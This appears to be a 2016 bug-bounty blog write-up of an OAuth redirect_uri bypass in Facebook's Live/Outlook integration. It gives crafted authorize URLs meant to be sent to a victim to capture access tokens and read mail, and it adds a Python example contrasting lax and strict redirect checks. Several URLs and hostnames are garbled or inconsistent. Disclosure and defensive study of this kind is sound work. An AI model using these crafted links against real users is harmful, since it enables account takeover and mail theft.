Saturday, March 26, 2016

NEW FACEBOOK EXPLOIT LEAD TO Authentication BYPASS

Facebook Live Application Authentication bypass




Hello Bug Bounty POC viewers. Today we are going to share a Facebook Live Application authentication bypass with you. This bug was found by Abdellah Yaala, a security researcher from Morocco. We've taken permission from him to publish this POC on Bug Bounty POC. The finder of this bug reserves the full authority to publish or unpublish it. So let's start 😉
There is a Live app on Facebook through which a user can connect their Live account with Facebook. When a user wants to import his contacts or reset his Facebook password using Hotmail / Outlook, he visits the following URL to authorize the request:
https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=code&redirect_url=https://wwww.facebook.com/accept_token.php%3Fapi_ver%3Dwave5%26csrf%3DAY4SvijoflL0B8zdxFgngr88d1tg-qTPSqgb-3aYo-ER5rDcFXSfuBDr4Q4ebXs%26appdata%3D%257B%2522use_case%2522%253A1%252c%2522flow%2522%253A22%%252c%2522

As you can see, the redirect_uri parameter of the URL points to
https://facebook.com/accept_token.php?api_ver%3Dwave5%26csrf%3Day4Svijofll0b8ezdxf9gngr88ditg-qtpsqgb-3ayqo-er5rdcfxsfubdr4q41xbxs%26appdata%3d%257b%2522domain_id%2522%253a4%252c%2522tracked_params%2522%255b%255d%2522%257d
Now here's the bug: I can change that redirect_uri parameter and get the victim's token.
The bypass URI is
https://www.facebook.com/ACCEPT_TOKEN.PHP?/!#/n/?https://apps.facebook.com/app_id?

Example – the link I send to the user:
https://login.live.com/oauth_author.srf?client_id=0000000044002503&response_type=code&redirect_url=facebook.com/accept_token.php%3f%2f%21%23%2fn%3fapps.facebook.com%2f935728666477748%2f&locale=en-us&scope=wli.contacts_email&display=popup&swu=1&username=ocpdomaine%40hotmail.com


So when this maliciously crafted URL is sent to the victim, I can obtain the victim's access token, and with it I can read the victim's inbox by changing the scope parameter to
scope=https://outlookoffice.ocm/Mail.Read
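The root cause described above is the authorization server accepting a redirect_uri that merely resembles the registered one. The following Python example is added here and is not code from the write-up, from Facebook or from Microsoft: it contrasts a prefix-style check, which accepts the crafted URI quoted above, with an exact-match check that rejects it, and it builds an authorize URL that keeps redirect_uri fixed and carries the per-request CSRF value in the OAuth `state` parameter instead of inside the redirect URI. The client id and the crafted redirect are the ones quoted in the write-up; the registration table, the registered URI and the function names are assumptions for illustration.

```python
from urllib.parse import urlsplit, urlencode

# Client id exactly as it appears in the write-up's authorize URLs.
CLIENT_ID = "0000000044002503"

# The bypass URI from the write-up: upper-cased path, a query of "/!",
# and everything after "#" is a fragment that a lax check never looks at.
CRAFTED_REDIRECT = (
    "https://www.facebook.com/ACCEPT_TOKEN.PHP?/!#/n/?https://apps.facebook.com/app_id?"
)

# Constructed registration table (assumption): client id -> the exact
# redirect URI(s) the client registered with the authorization server.
REGISTERED_REDIRECTS = {
    CLIENT_ID: {"https://www.facebook.com/accept_token.php"},
}

AUTHORIZE_ENDPOINT = "https://login.live.com/oauth20_authorize.srf"  # from the write-up


def lax_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """Prefix-style check: accept anything that starts with a registered URI.

    This is the weak pattern such a bypass relies on. Case folding and
    prefix matching let path, query and fragment tricks through.
    """
    allowed = REGISTERED_REDIRECTS.get(client_id, set())
    return any(redirect_uri.lower().startswith(base.lower()) for base in allowed)


def strict_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """Exact-match check: parse both URIs and compare scheme, host:port,
    path and query byte for byte; fragments are never allowed."""
    allowed = REGISTERED_REDIRECTS.get(client_id, set())
    try:
        given = urlsplit(redirect_uri)
    except ValueError:
        return False
    if given.scheme != "https" or given.fragment:
        return False
    for base in allowed:
        reg = urlsplit(base)
        same = (
            given.scheme == reg.scheme
            and given.netloc == reg.netloc
            and given.path == reg.path      # case-sensitive: ACCEPT_TOKEN.PHP != accept_token.php
            and given.query == reg.query    # dynamic data belongs in `state`, not here
        )
        if same:
            return True
    return False


def build_authorize_url(client_id: str, csrf_token: str, scope: str = "wli.contacts_email") -> str:
    """Build an authorize URL whose redirect_uri is the registered value verbatim.

    The per-request CSRF token travels in the standard OAuth `state`
    parameter, so the redirect_uri can be compared exactly on return.
    (`state` and the parameter name `redirect_uri` are standard OAuth 2.0;
    the write-up's own URLs spell the parameter `redirect_url`.)
    """
    registered = sorted(REGISTERED_REDIRECTS[client_id])[0]
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": registered,
        "scope": scope,
        "state": csrf_token,
    }
    return AUTHORIZE_ENDPOINT + "?" + urlencode(params)


if __name__ == "__main__":
    print("lax accepts crafted URI:   ", lax_redirect_check(CLIENT_ID, CRAFTED_REDIRECT))
    print("strict accepts crafted URI:", strict_redirect_check(CLIENT_ID, CRAFTED_REDIRECT))
    print(build_authorize_url(CLIENT_ID, "constructed-csrf-value"))
```

The strict check also rejects the write-up's legitimate URL as it was built, because that URL carried a changing csrf value inside the redirect URI's query; moving that value into `state` is what makes exact matching workable.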

Facebook Live Application Authentication bypass – Reply of Facebook:
[Screenshots of Facebook's reply; images not preserved in this copy]

Facebook Live Application Authentication bypass – Video POC:





Timeline
———-
Oct 25, 2015 – Report Sent
Oct 29, 2015 – Facebook needs a proof of concept
Oct 30, 2015 – Proof of concept sent
Nov 4, 2015 at 00h15 GMT – Escalation by Facebook
Nov 4, 2015 at 2h25 GMT – Fix confirmed by Facebook
Nov 6, 2015 – Bounty Awarded of $7500 by Facebook
